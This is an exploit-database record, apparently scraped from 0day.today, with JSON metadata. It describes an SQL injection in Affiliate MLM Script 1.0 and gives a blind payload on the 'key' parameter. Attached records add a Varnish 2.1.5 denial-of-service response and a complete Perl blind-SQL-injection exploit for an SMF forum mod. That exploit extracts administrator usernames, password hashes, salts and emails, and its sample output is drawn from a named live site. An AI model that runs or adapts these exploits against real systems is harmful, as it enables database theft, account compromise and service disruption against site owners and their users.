ID 1337DAY-ID-29156
Type zdt
Reporter Ihsan Sencan
Modified 2017-12-10T00:00:00
Description
Exploit for the PHP platform in the web applications category
# # # # #
# Exploit Title: Affiliate MLM Script 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/affiliate-mlm-script/
# Demo: http://www.smsemailmarketing.in/demo/Affiliate/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands through the `key` GET parameter of product-category.php.
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/product-category.php?key=[SQL]
#
# Parameter: key (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: key=a%' AND 5436=5436 AND '%'='
#
# # # # #
# 0day.today [2018-04-09] #
{"sourceData": "# # # # # \r\n# Exploit Title: Affiliate MLM Script 1.0 - SQL Injection\r\n# Dork: N/A\r\n# Date: 08.12.2017\r\n# Vendor Homepage: https://www.phpscriptsmall.com/\r\n# Software Link: https://www.phpscriptsmall.com/product/affiliate-mlm-script/\r\n# Demo: http://www.smsemailmarketing.in/demo/Affiliate/\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n# \r\n# Proof of Concept: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/product-category.php?key=[SQL]\r\n# \r\n# Parameter: key (GET)\r\n# Type: boolean-based blind\r\n# Title: AND boolean-based blind - WHERE or HAVING clause\r\n# Payload: key=a%' AND 5436=5436 AND '%'='\r\n# \r\n# # # # #\n\n# 0day.today [2018-04-09] #", "history": [], "description": "Exploit for php platform in category web applications", "sourceHref": "https://0day.today/exploit/29156", "reporter": "Ihsan Sencan", "href": "https://0day.today/exploit/description/29156", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "07408a1a22c6e0c3e9a14af4dcfd6d40"}, {"key": "modified", "hash": "f133700604598b586ea25a3208597d65"}, {"key": "published", "hash": "f133700604598b586ea25a3208597d65"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8f9da6443571f75195f401f82e60b810"}, {"key": "sourceData", "hash": "415084c5d4b28312f5392baa0bc61b25"}, {"key": "sourceHref", "hash": "8edebca3e1214303ee6a8fb0b89521a7"}, {"key": "title", "hash": "f556da1c4966a529b441c59cae6c5ec8"}, {"key": 
"type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 2, "references": [], "lastseen": "2018-04-09T19:57:08", "published": "2017-12-10T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "1337DAY-ID-29156", "hash": "3a2a2a107c8ebde247b26d8f6d7560cc26253abf7082799508d05baff4c0cbef", "modified": "2017-12-10T00:00:00", "title": "Affiliate MLM Script 1.0 - product-category.php?key SQL Injection Vulnerability", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-5436"]}], "modified": "2018-04-09T19:57:08"}, "vulnersScore": 7.5}}
{"securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "description": "Different DoS conditions on HTTP headers parsing.", "modified": "2013-03-11T00:00:00", "published": "2013-03-11T00:00:00", "id": "SECURITYVULNS:VULN:12934", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12934", "title": "Varnish multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "description": "\r\n\r\n###############################################\r\n# fetch_straight() | ((uintmax_t)cl == cll) #\r\n###############################################\r\n#\r\n# Authors:\r\n#\r\n# 22733db72ab3ed94b5f8a1ffcde850251fe6f466\r\n# c8e74ebd8392fda4788179f9a02bb49337638e7b\r\n# AKAT-1\r\n#\r\n#######################################\r\n\r\n# Versions: 2.1.5\r\n# Summary\r\nIt is possible to crash (via assert) varnish child processes by sending invalid Content-Length reponse header.\r\n\r\n* Panic message: Assert error in fetch_straight(), cache_fetch.c line 65:#012 Condition((uintmax_t)cl == cll) not true.\r\n\r\nPOC(response):\r\n -- cut --\r\nHTTP/1.1 200 OK\r\nContent-Type: text/xml; charset=utf-8\r\nContent-Length: 99999999999999999\r\n\r\n\r\n-- cut --\r\nEOF\r\n", "modified": "2013-03-11T00:00:00", "published": "2013-03-11T00:00:00", "id": "SECURITYVULNS:DOC:29156", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29156", "title": "Varnish 2.1.5 DoS in fetch_straight() while parsing Content-Length header", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-02-21T01:37:36", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-06-30T00:00:00", "published": "2009-06-30T00:00:00", "id": "1337DAY-ID-5436", "href": "https://0day.today/exploit/description/5436", "type": "zdt", "title": "SMF Mod Member Awards 1.0.2 Blind 
SQL Injection Exploit", "sourceData": "=======================================================\r\nSMF Mod Member Awards 1.0.2 Blind SQL Injection Exploit\r\n=======================================================\r\n\r\n\r\n-------------------------------------------------------------------------\r\n SMF Component Member Awards Blind SQL-injection Vulnerability\r\n-------------------------------------------------------------------------\r\n author: eLwaux\r\n-------------------------------------------------------------------------\r\n usage:\r\n expl.pl http://site.com/smf/index.php ID_MEMBER TABLE_PREF {params}\r\n params:\r\n -v = get version()\r\n -u = get user()\r\n -d = get database() \r\n -an = get User Name (\u00d0\u00bb\u00d0\u00be\u00d0\u00b3\u00d0\u00b8\u00d0\u00bd)\r\n -ap = get User Password (sha1 \u00d1\u2026\u00d0\u00b5\u00d1\u02c6)\r\n -as = get User Salt (\u00d1\u0081\u00d0\u00b0\u00d0\u00bb\u00d1\u0152\u00d1\u201a)\r\n -am = get User Mail (\u00d0\u00b5\u00d0\u00bc\u00d0\u00b5\u00d0\u00b9\u00d0\u00bb)\r\n-------------------------------------------------------------------------\r\n (\r\n also you can modif script source:\r\n $SHOW_ALL = 1; == show brute-step result\r\n $SHOW_COUNT_REQ = 1 == show req's count\r\n $OPTIMAL = 1 == optimal brute\r\n )\r\n-------------------------------------------------------------------------\r\nexample:\r\n http://scrubs.net.ru/cms/forum/index.php\r\n\r\n ] Host: scrubs.net.ru\r\n BAD answer = '\u00d0\u017e\u00d1\u02c6\u00d0\u00b8\u00d0\u00b1\u00d0\u00ba\u00d0\u00b0'\r\n ] version() = 5\r\n ] user() = [email\u00a0protected]\r\n ] database() = db\r\n ] id=1 NAME = zhbanito\r\n ] id=1 PASS = 4edd40635ac6fd263084d5ccc6fdc624fef3c932\r\n ] id=1 SALT = fe81\r\n ] id=1 MAIL = [email\u00a0protected]\r\n-------------------------------------------------------------------------\r\n exploit (perl):\r\n \r\n #! 
/usr/bin/perl -w\r\n\r\n use IO::Socket;\r\n use warnings;\r\n #use threads;\r\n #use threads::shared;\r\n\r\n $SHOW_ALL = 1;\r\n $SHOW_COUNT_REQ = 1;\r\n $OPTIMAL = 1;\r\n\r\n print \" SMF ] MemberAwards 1.0.2 exploit\\n\";\r\n print \" eLwaux(c)antichat 2009\\n\\n\";\r\n\r\n if (!$ARGV[0]) {\r\n print \" usage:\\n\".\r\n \" expl.pl http://site.com/smf/index.php ID_MEMBER TABLE_PREF {params}\\n\".\r\n \" params:\\n\".\r\n \" -v = get version()\\n\".\r\n \" -u = get user()\\n\".\r\n \" -d = get database()\\n\".\r\n \" -an = get User Name\\n\".\r\n \" -ap = get User Password\\n\".\r\n \" -as = get User Salt\\n\".\r\n \" -am = get User Mail\\n\";\r\n exit(0);\r\n }\r\n\r\n my $Uid = (!$ARGV[1])?'1':$ARGV[1];\r\n my $pref = (!$ARGV[2])?'smf_':$ARGV[2];\r\n $link .= $ARGV[0].'?action=profile;sa=awardsMembers;u='.$Uid.';id={SQL}';\r\n\r\n $getV = $getU = $getD = $getAN = $getAP = $getAS = $getAM = 0;\r\n for (my $i=0;$i<$#ARGV+1;$i++) {\r\n my $q = $ARGV[$i];\r\n $getV = 1 if ($q eq '-v');\r\n $getU = 1 if ($q eq '-u');\r\n $getD = 1 if ($q eq '-d');\r\n $getAN = 1 if ($q eq '-an');\r\n $getAP = 1 if ($q eq '-ap');\r\n $getAS = 1 if ($q eq '-as');\r\n $getAM = 1 if ($q eq '-am');\r\n }\r\n\r\n if ($link =~ /[http:\\/\\/]{0,}(.+?)\\/.+?{SQL}/) {\r\n $host = $1;\r\n }\r\n\r\n print ' ] Host: '.$host.\"\\n\";\r\n $BAD = &getBadAnswer();\r\n \r\n my $SFrom = 0;\r\n $SFrom = 41 if ($OPTIMAL == 1);\r\n my $SEnd = 0;\r\n $SEnd = 122 if ($OPTIMAL == 1);\r\n \r\n print \" BAD answer = '$BAD'\\n\\n\";\r\n print ' ] version() = '.&getVersion(3,5).\"\\n\" if ($getV==1);\r\n print ' ] user() = '.&getUser1($SFrom,$SEnd).\"\\n\" if ($getU==1); # a..z\r\n print ' ] database() = '.&getDatabase($SFrom,$SEnd).\"\\n\" if ($getD==1); # a..z\r\n print \"\\n\";\r\n\r\n print ' ] id='.$Uid.' NAME = '.&getAdminName($SFrom,$SEnd).\"\\n\" if ($getAN==1); # 0..9,a..z\r\n print ' ] id='.$Uid.' PASS = '.&getAdminPass($SFrom,$SEnd).\"\\n\" if ($getAP==1); # 0..9,a..z\r\n print ' ] id='.$Uid.' 
SALT = '.&getAdminSalt($SFrom,$SEnd).\"\\n\" if ($getAS==1); # a..z\r\n print ' ] id='.$Uid.' MAIL = '.&getAdminMail($SFrom,$SEnd).\"\\n\" if ($getAM==1); # a..z\r\n\r\n #print \"\\n\";\r\n print ' ] requests() = '.$SHOW_COUNT_REQ.\"\\n\"; # a..z\r\n\r\n exit(0);\r\n\r\n\r\n\r\n # get BAD answer\r\n sub getBadAnswer() {\r\n $BAD = \"An Error Has Occurred!\";\r\n if (&req('1+and+substring(version(),1,1)=-1##+',1000) =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n $BAD = $1;\r\n }\r\n return $BAD;\r\n }\r\n\r\n # GET VERSION() METHOD 1 -==--=--=-=-=-=-=-=-=-=-=-==-=--=\r\n # ascii(lower(substring(version(),x,1) WHERE IN (1,...,Y)\r\n sub getVersion($$) {\r\n for($i=$_[0]; $i<=$_[1]; $i++) {\r\n $r = &req('1+and+substring(version(),1,1)='.$i.'##+',1000);\r\n if ($r =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n if (index($1,$BAD)==-1) {\r\n $SHOW_COUNT_REQ++ if ($SHOW_COUNT_REQ!=0);\r\n return $i;\r\n }\r\n }\r\n }\r\n return '<'.$_[0].' and >'.$_[1];\r\n }\r\n\r\n # GET USER() METHOD 1 -==--=--=-=-=-=-=-=-=-=-=-==-=--=\r\n # ascii(lower(substring(user(),x,1) WHERE IN (1,...,Y)\r\n sub getUser1($$) {\r\n return &wherein($_[0],$_[1],'user()',0);\r\n }\r\n\r\n # GET DATABASE -==--=-==--=---=-==-=-=-=-=-=-=-=-=-==-=--=\r\n # ascii(lower(substring(database(),x,1) WHERE IN (1,...,Y)\r\n sub getDatabase($$) {\r\n return &wherein($_[0],$_[1],'database()',0);\r\n }\r\n\r\n # GET USER METHOD 2 -==--=--=-=-=-=-=-=\r\n # ascii(lower(substring(user(),1,1)))=Y\r\n sub getUser2($$) {\r\n $finish = 0; $s = 1;\r\n $user = '';\r\n while ($finish!=1) {\r\n $gs = 0;\r\n print \" user($s): \\n\" if ($SHOW_ALL==1);\r\n for($i=$_[0]; $i<=$_[1]; $i++) {\r\n if (&req('1+and+ascii(lower(substring(user(),'.$s.',1)))='.$i.'##+',1000) =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n print \" (\".chr($i).\") $i,\\n\" if ($SHOW_ALL==1);\r\n if (index($1,$BAD)==-1) {\r\n $user .= chr($i);\r\n print \" found $s chars: $i = \".chr($i).\" ($user)\\n\" if 
($SHOW_ALL==1);\r\n $s++; $gs = 1;\r\n last;\r\n }\r\n }\r\n }\r\n print \"\\n\" if ($SHOW_ALL==1);\r\n if ($gs == 0) {\r\n if ($user eq '') {return '<'.$_[0].' and >'.$_[1];}\r\n else {return $user;}\r\n }\r\n }\r\n \r\n }\r\n\r\n # GET ADMIN PASS_HASH -==--=-==--=---=-==-=-=-=-=-=-=-=-=-==-=--=\r\n #smf_members (ID_MEMBER,memberName,passwd,emailAddress,passwordSalt)\r\n # passwd = sha1(strtolower(username.password)\r\n # salt = substr(md5(mt_rand()), 0, 4)\r\n\r\n sub getAdminName($$) {\r\n return &wherein($_[0],$_[1],'memberName',1);\r\n }\r\n sub getAdminPass($$) {\r\n return &wherein($_[0],$_[1],'passwd',1);\r\n }\r\n sub getAdminSalt($$) {\r\n return &wherein($_[0],$_[1],'passwordSalt',1);\r\n }\r\n sub getAdminMail($$) {\r\n return &wherein($_[0],$_[1],'emailAddress',1);\r\n }\r\n\r\n\r\n # NEED FUNCTIONS -==--=--=-=-=-=-=-=-=-=-=-==-=--=\r\n\r\n sub req($$) {\r\n $SHOW_COUNT_REQ++ if ($SHOW_COUNT_REQ!=0);\r\n $l = $link;\r\n $l =~ s/{SQL}/$_[0]/;\r\n $r = \"GET $l HTTP/1.1\\r\\nHost: $host\\r\\n\\r\\n\";\r\n my $sock = sock();\r\n print $sock $r;\r\n read($sock,my $a,$_[1]);\r\n return $a;\r\n }\r\n\r\n sub mlist($$) {\r\n $s = '';\r\n for(my $i=$_[0];$i<=$_[1];$i++) {$s.=$i.',';}\r\n return substr($s,0,length($s)-1);\r\n }\r\n\r\n\r\n sub wherein($$$$) { # ,,,, (1=user,2=else)\r\n print \" ] $_[2]\\n\" if ($SHOW_ALL==1);\r\n my $WHEREIN = 10; # WHERE IN (1,2,3,4,5,6,7,8,9,10)\r\n my $res = ''; my $c = 1;\r\n my $fmin = $_[0];\r\n my $fmax = $_[1];\r\n while ($c>=1) {\r\n my $gs = 0;\r\n for (my $i=0;$i<=int(($fmax-$fmin)/$WHEREIN);$i++){\r\n my $s1 = int($fmin+$i*$WHEREIN);\r\n my $s2 = int(($s1+$WHEREIN)>$fmax)?$fmax:($s1+$WHEREIN);\r\n my $ch = ($_[3]==1)?&getUBRUTE($s1,$s2,$c,$_[2]):&getBRUTE($s1,$s2,$c,$_[2]);\r\n if ($ch ne '?') {\r\n $res.=$ch; print \" $_[2]($c) = $ch [$res]\\n\" if ($SHOW_ALL==1);\r\n $c++; $gs = 1; last;\r\n }\r\n }\r\n if ($gs == 0) { $c=-1; return $res; last; }\r\n }\r\n }\r\n\r\n sub getBRUTE($$$$) { #start,end,pos,text\r\n 
print ' '.$_[0].'...'.$_[1].' ['.$_[2].\"]\\n\" if ($SHOW_ALL==1);\r\n if (&req('1+and+ascii(lower(substring('.$_[3].','.$_[2].',1)))+in+('.&mlist($_[0],$_[1]).')%23+',1000) =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n if (index($1,$BAD)==-1) {\r\n for(my $i=$_[0]; $i<=$_[1]; $i++) {\r\n if (&req('1+and+ascii(lower(substring('.$_[3].','.$_[2].',1)))='.$i.'%23+',1000) =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n if (index($1,$BAD)==-1) {\r\n return chr($i); last;\r\n }\r\n }\r\n }\r\n }\r\n }\r\n return '?';\r\n }\r\n\r\n sub getUBRUTE($$$$) { #start,end,pos,text\r\n print ' ['.$_[2].'] '.$_[0].'...'.$_[1].\"\\n\" if ($SHOW_ALL==1);\r\n if (&req('1+and+(%23)%0Aselect+ascii(lower(substring('.$_[3].','.$_[2].',1)))+from+'.$pref.'members+where+ID_MEMBER='.$Uid.')+in+('.&mlist($_[0],$_[1]).')%23+',1000) =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n if (index($1,$BAD)==-1) {\r\n for(my $i=$_[0]; $i<=$_[1]; $i++) {\r\n if (&req('1+and+(%23)%0Aselect+ascii(lower(substring('.$_[3].','.$_[2].',1)))+from+'.$pref.'members+where+ID_MEMBER='.$Uid.')='.$i.'%23+',1000) =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n if (index($1,$BAD)==-1) {\r\n return chr($i); last;\r\n }\r\n }\r\n }\r\n }\r\n }\r\n return '?';\r\n }\r\n\r\n sub sock {\r\n my $sock;\r\n do {\r\n $sock = new IO::Socket::INET \r\n (\r\n PeerAddr => $host,\r\n PeerPort => 80, \r\n PeerProto => 'tcp', \r\n TimeOut => 10\r\n ) or print \" ] connection error!\\n\";\r\n } while (!$sock);\r\n return $sock;\r\n }\r\n-------------------------------------------------------------------------\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5436"}]}